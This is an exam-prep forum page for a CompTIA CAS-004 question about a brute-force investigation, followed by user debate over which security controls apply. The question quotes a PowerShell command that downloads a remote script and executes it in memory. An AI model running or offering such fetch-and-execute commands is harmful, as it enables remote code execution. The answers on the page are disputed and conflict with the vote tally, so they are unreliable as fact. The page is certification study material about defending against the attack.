ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam CAS-004 All Questions

View all questions & answers for the CAS-004 exam
Go to Exam

Exam CAS-004 topic 1 question 109 discussion

Actual exam question from CompTIA's CAS-004
Question #: 109
Topic #: 1
[All CAS-004 Questions]

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois`
Which of the following security controls would have alerted and prevented the next phase of the attack?

  • A. Antivirus and UEBA
  • B. Reverse proxy and sandbox
  • C. EDR and application approved list
  • D. Forward proxy and MFA
Show Suggested Answer Hide Answer
Suggested Answer: C 🗳️
by RevZig67 at May 13, 2022, 7:32 p.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
RevZig67
Highly Voted 3 years ago
Selected Answer: C
An EDR and whitelist should protect from this attack.
upvoted 11 times
...
armid
Most Recent 11 months ago
if you think about this from MITRE perspective, the attacker is in the initial access (with doing some extra recon) phase. Next phase should be execution - to try to run malicious code. So answer should be C Bruteforcing phase is over as indicated in the question (analyst found that evidence in the logs) so MFA at this point is bit too late. B. would help but not alert. And help only partially, attacke would eventually find a way to bypass this A. Antivirus could prevent and UEBA could alert, but C is already much safer option.
upvoted 1 times
...
cyspec
11 months, 1 week ago
Selected Answer: A
"alerted" narrows the options down to A and C. Since it involves failed login attempts, a user account must have been accessed. UEBA would have flagged anomalies regarding a user's actions (running PowerShell). There was no further indication of the attacker using other applications, as they are downloading PS scripts. Approved application lists would not have done if PS successfully ran (meaning that PS was on the list) and the attacker continued using PS.
upvoted 1 times
...
BiteSize
1 year, 10 months ago
Selected Answer: C
EDR and application whitelisting are the only things that would see a PowerShell script spawn a new process and understand that it is not baseline behavior to respond effectively. Source: Verifying each answer against Chat GPT, my experience, other test banks, a written book, and weighing in the discussion from all users to create a 100% accurate guide for myself before I take the exam. (It isn't easy because of the time needed, but it is doing my diligence)
upvoted 4 times
...
javier051977
2 years, 2 months ago
Selected Answer: B
The PowerShell command is using the Invoke-Expression (IEX) function to execute a remote script hosted on a third-party website. This is an example of fileless malware, which can bypass traditional antivirus solutions.
upvoted 2 times
...
angryelvis
2 years, 5 months ago
Is the key word(s) actual "next phase"? If so, MFA would prevent logins and a forward proxy could prevent a compromised workstation from reaching directly home. I'm not certain about the proxy, please tell me if I'm wrong.
upvoted 4 times
Mr_BuCk3th34D
2 years, 5 months ago
I agree. To alert and prevent the next phase of the attack, the security analyst should consider implementing a forward proxy and MFA (Multi-Factor Authentication). This is the most effective answer for the NEXT phase of the attack. In this case, a forward proxy could be configured to block access to the external-facing mail server based on the number of failed login attempts, which would help prevent the attack from progressing. By implementing MFA, the organization can help prevent unauthorized access to the external-facing mail server, even if an attacker is able to obtain a user's password.
upvoted 3 times
...
Serliop378
2 years, 2 months ago
It would not have alerted the next phase of the attack like an EDR
upvoted 1 times
tefyayaydu
1 year, 7 months ago
A forward proxy would have sent out an alert in the 'next' phase of an attack, which is the login attempts. The application list will not stop anything in this regard. Read Bucket's response below. If it wasn't asking for 'next' phase than EDR would be correct for the current phase.
upvoted 1 times
...
...
...
dangerelchulo
2 years, 9 months ago
Selected Answer: C
Key word alerted, EDR does that
upvoted 4 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel